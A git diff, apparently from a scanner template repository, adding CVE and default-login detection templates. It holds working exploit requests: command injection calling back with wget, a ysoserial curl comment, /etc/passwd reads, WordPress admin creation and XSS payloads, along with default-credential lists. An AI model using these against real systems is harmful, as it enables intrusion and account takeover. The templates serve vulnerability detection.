+ description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices uses for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).
+ reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
+ severity: medium
+ tags: cve,cve2021,commscope,ruckus,debug
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/service/v1/service-details"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "application/json"
+ - type: word
+ words:
+ - "message"
+ - "ok"
+ - "data"
+ - "dns"
+ - "gateway"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml
new file mode 100644
index 0000000000..c89877d50d
--- /dev/null
+++ b/cves/2021/CVE-2021-33544.yaml
@@ -0,0 +1,26 @@
+id: CVE-2021-33544
+
+info:
+ name: Geutebruck RCE
+ description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+ author: gy741
+ severity: critical
+ reference: |
+ - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
+ tags: cve,cve2021,geutebruck,rce,oob
+
+requests:
+ - raw:
+ - |
+ GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Encoding: gzip, deflate
+ Cache-Control: max-age=0
+ Connection: keep-alive
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2021/CVE-2021-33564.yaml b/cves/2021/CVE-2021-33564.yaml
new file mode 100644
index 0000000000..a2bbd5d431
--- /dev/null
+++ b/cves/2021/CVE-2021-33564.yaml
@@ -0,0 +1,23 @@
+id: CVE-2021-33564
+
+info:
+ name: Argument Injection in Ruby Dragonfly
+ author: 0xsapra
+ severity: critical
+ reference: https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/
+ tags: cve,cve2021,rce,ruby
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="
+ - "{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
diff --git a/cves/2021/CVE-2021-3374.yaml b/cves/2021/CVE-2021-3374.yaml
new file mode 100644
index 0000000000..a337b419ae
--- /dev/null
+++ b/cves/2021/CVE-2021-3374.yaml
@@ -0,0 +1,28 @@
+id: CVE-2021-3374
+
+info:
+ name: Rstudio Shiny Server Directory Traversal
+ author: geeknik
+ description: Rstudio Shiny-Server prior to 1.5.16 is vulnerable to directory traversal and source code leakage. This can be exploited by appending an encoded slash to the URL.
+ reference: https://github.com/colemanjp/rstudio-shiny-server-directory-traversal-source-code-leak
+ severity: medium
+ tags: cve,cve2021,rstudio,traversal
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/%2f/"
+ - "{{BaseURL}}/sample-apps/hello/%2f/"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "Index of /"
+ - type: regex
+ part: body
+ regex:
+ - "[A-Za-z].*\\.R"
diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml
new file mode 100644
index 0000000000..74213022a3
--- /dev/null
+++ b/cves/2021/CVE-2021-3377.yaml
@@ -0,0 +1,29 @@
+id: CVE-2021-3377
+
+info:
+ name: Ansi_up XSS
+ description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.
+ reference: |
+ - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
+ - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
+ author: geeknik
+ severity: medium
+
+requests:
+ - raw:
+ - |+
+ GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+
+ unsafe: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: word
+ words:
+ - "com\"/onmouseover=\"alert(1)\">"
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml
new file mode 100644
index 0000000000..f39c826555
--- /dev/null
+++ b/cves/2021/CVE-2021-3378.yaml
@@ -0,0 +1,52 @@
+id: CVE-2021-3378
+
+info:
+ name: FortiLogger Unauthenticated Arbitrary File Upload
+ author: dwisiswant0
+ severity: critical
+ reference: https://erberkan.github.io/2021/cve-2021-3378/
+ description: |
+ This template detects an unauthenticated arbitrary file upload
+ via insecure POST request. It has been tested on version 4.4.2.2 in
+ Windows 10 Enterprise.
+ tags: cve,cve2021,fortilogger,fortigate,fortinet
+
+requests:
+ - raw:
+ - |
+ POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
+ Accept: application/json
+ Referer: {{BaseURL}}
+ Connection: close
+ X-Requested-With: XMLHttpRequest
+
+ ------WebKitFormBoundarySHHbUsfCoxlX1bpS
+ Content-Disposition: form-data; name="file"; filename="poc.txt"
+ Content-Type: image/png
+
+ POC_TEST
+
+ ------WebKitFormBoundarySHHbUsfCoxlX1bpS
+
+ - |
+ GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "POC_TEST"
+ part: body
+
+ - type: word
+ words:
+ - "text/plain"
+ - "ASP.NET"
+ condition: and
+ part: header
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-33904.yaml b/cves/2021/CVE-2021-33904.yaml
new file mode 100644
index 0000000000..cdb7130cd7
--- /dev/null
+++ b/cves/2021/CVE-2021-33904.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-33904
+
+info:
+ name: Accela Civic Platform 21.1 - 'servProvCode' XSS
+ author: geeknik
+ description: In Accela Civic Platform through 21.1, the security/hostSignon.do parameter servProvCode is vulnerable to XSS.
+ reference: https://www.exploit-db.com/exploits/49980
+ severity: medium
+ tags: cve,cve2021,accela,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: word
+ words:
+ - '"k3woq"^confirm(document.domain)^"a2pbrnzx5a9"'
+ - 'servProvCode'
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-34429.yaml b/cves/2021/CVE-2021-34429.yaml
new file mode 100644
index 0000000000..ebc06a6eff
--- /dev/null
+++ b/cves/2021/CVE-2021-34429.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-34429
+
+info:
+ name: Jetty Authorization Before Parsing and Canonicalization Variation
+ author: Bernardo Rodrigues @bernardofsr | André Monteiro @am0nt31r0
+ severity: medium
+ description: |
+ For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.
+ reference: |
+ - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
+ tags: cve,cve2021,jetty
+
+requests:
+ - raw:
+ - |+
+ GET /%u002e/WEB-INF/web.xml HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+ - |+
+ GET /.%00/WEB-INF/web.xml HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+
+ unsafe: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ""
+ - "java.sun.com"
+ part: body
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "application/xml"
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-34621.yaml b/cves/2021/CVE-2021-34621.yaml
new file mode 100644
index 0000000000..8e59a60f28
--- /dev/null
+++ b/cves/2021/CVE-2021-34621.yaml
@@ -0,0 +1,106 @@
+id: CVE-2021-34621
+
+info:
+ name: WordPress ProfilePress wp-user-avatar plugin make admin users
+ author: 0xsapra
+ severity: critical
+ reference: https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin
+ tags: cve,cve2021,wordpress,wp-plugin
+
+requests:
+ - raw:
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
+ Accept: application/json, text/javascript, */*; q=0.01
+ X-Requested-With: XMLHttpRequest
+ Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589
+ Origin: {{BaseURL}}
+ Referer: {{BaseURL}}
+ Connection: close
+
+ -----------------------------138742543134772812001999326589
+ Content-Disposition: form-data; name="reg_username"
+
+ {{randstr}}
+ -----------------------------138742543134772812001999326589
+ Content-Disposition: form-data; name="reg_email"
+
+ {{randstr}}@example.com
+ -----------------------------138742543134772812001999326589
+ Content-Disposition: form-data; name="reg_password"
+
+ {{randstr}}@example.com
+ -----------------------------138742543134772812001999326589
+ Content-Disposition: form-data; name="reg_password_present"
+
+ true
+ -----------------------------138742543134772812001999326589
+ Content-Disposition: form-data; name="reg_first_name"
+
+ {{randstr}}@example.com
+ -----------------------------138742543134772812001999326589
+ Content-Disposition: form-data; name="reg_last_name"
+
+ {{randstr}}@example.com
+ -----------------------------138742543134772812001999326589
+ Content-Disposition: form-data; name="_wp_http_referer"
+
+ /wp/?page_id=18
+ -----------------------------138742543134772812001999326589
+ Content-Disposition: form-data; name="pp_current_url"
+
+ {{BaseURL}}
+ -----------------------------138742543134772812001999326589
+ Content-Disposition: form-data; name="wp_capabilities[administrator]"
+
+ 1
+ -----------------------------138742543134772812001999326589
+ Content-Disposition: form-data; name="signup_form_id"
+
+ 1
+ -----------------------------138742543134772812001999326589
+ Content-Disposition: form-data; name="signup_referrer_page"
+
+
+ -----------------------------138742543134772812001999326589
+ Content-Disposition: form-data; name="action"
+
+ pp_ajax_signup
+ -----------------------------138742543134772812001999326589
+ Content-Disposition: form-data; name="melange_id"
+
+
+ -----------------------------138742543134772812001999326589--
+
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
+ Accept: application/json, text/javascript, */*; q=0.01
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ X-Requested-With: XMLHttpRequest
+ Origin: {{BaseURL}}
+ Referer: {{BaseURL}}
+ Connection: close
+
+ log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In
+
+ - |
+ GET /wp-admin/ HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Connection: close
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Welcome to your WordPress Dashboard"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-35336.yaml b/cves/2021/CVE-2021-35336.yaml
new file mode 100644
index 0000000000..3d974df91c
--- /dev/null
+++ b/cves/2021/CVE-2021-35336.yaml
@@ -0,0 +1,39 @@
+id: CVE-2021–35336
+
+info:
+ name: Unauthorised Remote Access of Internal Panel
+ author: Pratik Khalane
+ severity: critical
+ description: Finding the Tieline Admin Panels with default credentials.
+ reference: |
+ - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-35336
+ tags: cve,cve2021,tieline,default-login
+
+# admin:password
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/api/get_device_details'
+ headers:
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+ Referer: '{{BaseURL}}/assets/base/home.html'
+ Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ - ""
+ condition: and
+
+ - type: word
+ words:
+ - "text/xml"
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml
new file mode 100644
index 0000000000..5b884fab3a
--- /dev/null
+++ b/cves/2021/CVE-2021-35464.yaml
@@ -0,0 +1,34 @@
+id: CVE-2021-35464
+
+info:
+ author: madrobot
+ name: Pre-auth RCE in ForgeRock OpenAM
+ description: ForgeRock OpenAM unsafe Java deserialization RCE.
+ severity: critical
+ tags: cve,cve2021,openam,rce,java
+ reference: |
+ - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/openam/oauth2/..;/ccversion/Version'
+
+ # '{{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession='
+ # java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '='
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Set-Cookie: JSESSIONID="
+ part: header
+
+ - type: word
+ words:
+ - "Version Information -"
+ part: body
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-36380.yaml b/cves/2021/CVE-2021-36380.yaml
new file mode 100644
index 0000000000..f267fd3f68
--- /dev/null
+++ b/cves/2021/CVE-2021-36380.yaml
@@ -0,0 +1,24 @@
+id: CVE-2021-36380
+
+info:
+ name: Sunhillo SureLine - Unauthenticated OS Command Injection
+ description: The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.
+ author: gy741
+ severity: critical
+ reference: |
+ - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/
+ tags: cve,cve2021,sureline,rce,oob
+
+requests:
+ - raw:
+ - |
+ POST /cgi/networkDiag.cgi HTTP/1.1
+ Host: {{Hostname}}
+
+ command=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2021/CVE-2021-37216.yaml b/cves/2021/CVE-2021-37216.yaml
new file mode 100644
index 0000000000..33de2b4095
--- /dev/null
+++ b/cves/2021/CVE-2021-37216.yaml
@@ -0,0 +1,36 @@
+id: CVE-2021-37216
+
+info:
+ name: QSAN Storage Manager prior to v3.3.3 Reflected XSS
+ author: dwisiswant0
+ description: |
+ QSAN Storage Manager header page parameters does not filter special characters.
+ Remote attackers can inject JavaScript without logging in and launch
+ reflected XSS attacks to access and modify specific data.
+ reference: https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html
+ severity: medium
+ tags: cve,cve2021,xss,qsan
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/http_header.php"
+ headers:
+ X-Trigger-XSS: ""
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ part: body
+ words:
+ - '"HTTP_X_TRIGGER_XSS":""'
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: dsl
+ dsl:
+ - "!contains(tolower(all_headers), 'x-xss-protection')"
\ No newline at end of file
diff --git a/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml b/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml
new file mode 100644
index 0000000000..89d086f3dd
--- /dev/null
+++ b/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml
@@ -0,0 +1,22 @@
+id: micro-focus-ucmdb-default-credentials
+
+info:
+ name: Micro Focus UCMDB Default Credentials
+ author: dwisiswant0
+ severity: high
+ tags: ucmdb,default-login
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/ucmdb-ui/cms/loginRequest.do;"
+ body: "customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "LWSSO_COOKIE_KEY"
+ part: header
diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml
index 8f9cae4381..c235703f24 100644
--- a/default-logins/activemq/activemq-default-login.yaml
+++ b/default-logins/activemq/activemq-default-login.yaml
@@ -2,9 +2,9 @@ id: activemq-default-login
info:
name: Apache ActiveMQ Default Credentials
- author: pd-team
+ author: pdteam
severity: medium
- tags: apache,activemq,dlogin
+ tags: apache,activemq,default-login
requests:
- method: GET
@@ -18,6 +18,3 @@ requests:
- 'Welcome to the Apache ActiveMQ Console of '
- 'Broker '
condition: and
-
- # We could add a request condition block to only send this request if the
- # site response URL had activeMQ broker stuff in the source.
diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml
new file mode 100644
index 0000000000..30b1006bc0
--- /dev/null
+++ b/default-logins/aem/adobe-aem-default-credentials.yaml
@@ -0,0 +1,65 @@
+id: adobe-aem-default-credentials
+
+info:
+ name: Adobe AEM Default Credentials
+ author: random-robbie
+ severity: critical
+ tags: aem,default-login,fuzz
+requests:
+
+ - payloads:
+
+ rr_username:
+ - admin
+ - grios
+ - replication-receiver
+ - vgnadmin
+ - aparker@geometrixx.info
+ - jdoe@geometrixx.info
+ - james.devore@spambob.com
+ - matt.monroe@mailinator.com
+ - aaron.mcdonald@mailinator.com
+ - jason.werner@dodgit.com
+
+ rr_password:
+ - admin
+ - password
+ - replication-receiver
+ - vgnadmin
+ - aparker
+ - jdoe
+ - password
+ - password
+ - password
+ - password
+
+ attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
+
+ raw:
+ - |
+ POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
+ Accept: text/plain, */*; q=0.01
+ Accept-Language: en-US,en;q=0.5
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ X-Requested-With: XMLHttpRequest
+ Content-Length: 67
+ Origin: {{BaseURL}}
+ Referer: {{BaseURL}}/libs/granite/core/content/login.html
+ Connection: close
+
+ _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - login-token
+ - crx.default
+ condition: and
diff --git a/default-logins/alibaba/alibaba-canal-default-password.yaml b/default-logins/alibaba/alibaba-canal-default-password.yaml
new file mode 100644
index 0000000000..3009e5de43
--- /dev/null
+++ b/default-logins/alibaba/alibaba-canal-default-password.yaml
@@ -0,0 +1,27 @@
+id: alibaba-canal-default-password
+
+info:
+ name: Alibaba Canal Default Password
+ author: pdteam
+ severity: high
+ tags: alibaba,default-login
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/api/v1/user/login"
+ headers:
+ Content-Type: application/json
+ body: |
+ {"username":"admin","password":"123456"}
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - 'data":{"token"'
+ - '"code":20000'
+ condition: and
diff --git a/default-logins/ambari/ambari-default-credentials.yaml b/default-logins/ambari/ambari-default-credentials.yaml
index e3f68b2f1c..cd31405298 100644
--- a/default-logins/ambari/ambari-default-credentials.yaml
+++ b/default-logins/ambari/ambari-default-credentials.yaml
@@ -2,9 +2,9 @@ id: ambari-default-credentials
info:
name: Apache Ambari Default Credentials
- author: pd-team
+ author: pdteam
severity: medium
- tags: ambari,dlogin
+ tags: ambari,default-login
requests:
- method: GET
diff --git a/default-logins/apache/airflow-default-credentials.yaml b/default-logins/apache/airflow-default-credentials.yaml
new file mode 100644
index 0000000000..50bcb9d651
--- /dev/null
+++ b/default-logins/apache/airflow-default-credentials.yaml
@@ -0,0 +1,61 @@
+id: airflow-default-credentials
+
+info:
+ name: Apache Airflow Default Credentials
+ author: pdteam
+ severity: critical
+ tags: airflow,default-login
+ reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
+
+requests:
+ - raw:
+ - |
+ GET /admin/airflow/login HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ Connection: close
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.9
+
+ - |
+ POST /admin/airflow/login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 152
+ Cache-Control: max-age=0
+ Origin: {{BaseURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Referer: {{BaseURL}}/admin/airflow/login
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en-IN,en;q=0.9
+ Connection: close
+
+ username=airflow&password=airflow&_csrf_token={{csrf_token}}
+
+ extractors:
+ - type: regex
+ name: csrf_token
+ group: 1
+ part: body
+ internal: true
+ regex:
+ - 'csrf_token" type="hidden" value="([A-Za-z0-9.-]+)">'
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "session=."
+ - "/admin/"
+ part: header
+ condition: and
+
+ - type: word
+ words:
+ - 'You should be redirected automatically to target URL: /admin/ '
+ part: body
+
+ - type: status
+ status:
+ - 302
diff --git a/default-logins/apache/apache-superset-default-credentials.yaml b/default-logins/apache/apache-superset-default-credentials.yaml
new file mode 100644
index 0000000000..58bc528ac9
--- /dev/null
+++ b/default-logins/apache/apache-superset-default-credentials.yaml
@@ -0,0 +1,61 @@
+id: apache-superset-default-credentials
+
+info:
+ name: Apache Superset Default Credentials
+ author: dhiyaneshDK
+ severity: high
+ reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
+ tags: apache, default-login
+
+requests:
+ - raw:
+ - |
+ GET /login/ HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ Connection: close
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.9
+
+ - |
+ POST /login/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 152
+ Cache-Control: max-age=0
+ Origin: {{BaseURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Referer: {{BaseURL}}/admin/airflow/login
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en-IN,en;q=0.9
+ Connection: close
+
+ csrf_token={{csrff_token}}&username=admin&password=admin
+
+ extractors:
+ - type: regex
+ name: csrff_token
+ group: 1
+ part: body
+ internal: true
+ regex:
+ - 'value="(.*?)">'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ condition: and
+ words:
+ - 'Redirecting... '
+ - 'Redirecting... '
+
+ - type: word
+ part: header
+ words:
+ - 'session'
+
+ - type: status
+ status:
+ - 302
diff --git a/default-logins/apache/tomcat-manager-default.yaml b/default-logins/apache/tomcat-manager-default.yaml
index 9baec5b68e..12d11eae20 100644
--- a/default-logins/apache/tomcat-manager-default.yaml
+++ b/default-logins/apache/tomcat-manager-default.yaml
@@ -3,7 +3,7 @@ info:
name: tomcat-manager-default-password
author: pdteam
severity: high
- tags: tomcat,apache,dlogin
+ tags: tomcat,apache,default-login
requests:
@@ -44,7 +44,7 @@ requests:
- j5Brn9
- tomcat
- attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb
+ attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
raw:
# Request with simple param and header manipulation with DSL functions
diff --git a/default-logins/arl/arl-default-password.yaml b/default-logins/arl/arl-default-password.yaml
new file mode 100644
index 0000000000..08f426e7da
--- /dev/null
+++ b/default-logins/arl/arl-default-password.yaml
@@ -0,0 +1,29 @@
+id: arl-default-password
+
+info:
+ name: ARL Default Password
+ author: pikpikcu
+ severity: high
+ tags: arl,default-login
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/api/user/login"
+ headers:
+ Content-Type: application/json; charset=UTF-8
+ body: |
+ {"username":"admin","password":"arlpass"}
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - '"message": "success"'
+ - '"username": "admin"'
+ - '"type": "login"'
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/default-logins/axis2/axis2-default-password.yaml b/default-logins/axis2/axis2-default-password.yaml
new file mode 100644
index 0000000000..3b08bd2654
--- /dev/null
+++ b/default-logins/axis2/axis2-default-password.yaml
@@ -0,0 +1,27 @@
+id: axis2-default-password
+
+info:
+ name: Axis2 Default Password
+ author: pikpikcu
+ severity: high
+ tags: axis,apache,default-login
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/axis2-admin/login"
+ - "{{BaseURL}}/axis2/axis2-admin/login"
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+ body: "userName=admin&password=axis2&submit=+Login+"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "Welcome to Axis2 Web Admin Module !! "
+
+ - type: status
+ status:
+ - 200
diff --git a/default-logins/chinaunicom/chinaunicom-modem-default-credentials.yaml b/default-logins/chinaunicom/chinaunicom-modem-default-credentials.yaml
new file mode 100644
index 0000000000..ed58f2f847
--- /dev/null
+++ b/default-logins/chinaunicom/chinaunicom-modem-default-credentials.yaml
@@ -0,0 +1,22 @@
+id: chinaunicom-modem-default-credentials
+
+info:
+ name: Chinaunicom Modem Default Credentials
+ author: princechaddha
+ severity: high
+ tags: chinaunicom,default-login
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/cu.html"
+ body: "frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password="
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 302
+ - type: word
+ words:
+ - "/menu.gch"
+ part: header
diff --git a/default-logins/dell/dell-emc-ecom-default-credentials.yaml b/default-logins/dell/dell-emc-ecom-default-credentials.yaml
new file mode 100644
index 0000000000..5c46e83359
--- /dev/null
+++ b/default-logins/dell/dell-emc-ecom-default-credentials.yaml
@@ -0,0 +1,31 @@
+id: dell-emc-ecom-default-credentials
+
+info:
+ name: Dell EMC ECOM Default Credentials
+ author: Techryptic (@Tech)
+ severity: high
+ description: Default Credentials of admin:#1Password on Dell EMC ECOM application.
+ reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
+ tags: dell,emc,ecom,default-login
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ headers:
+ Authorization: Basic YWRtaW46IzFQYXNzd29yZA==
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Set-Cookie: ECOMSecurity"
+ part: header
+
+ - type: word
+ words:
+ - "Welcome to ECOM"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml
new file mode 100644
index 0000000000..d4e68fe296
--- /dev/null
+++ b/default-logins/dell/dell-idrac-default-login.yaml
@@ -0,0 +1,27 @@
+id: dell-idrac-default-login
+info:
+ name: Dell iDRAC6/7/8 Default login
+ author: kophjager007
+ severity: high
+ tags: dell,idrac,default-login
+
+requests:
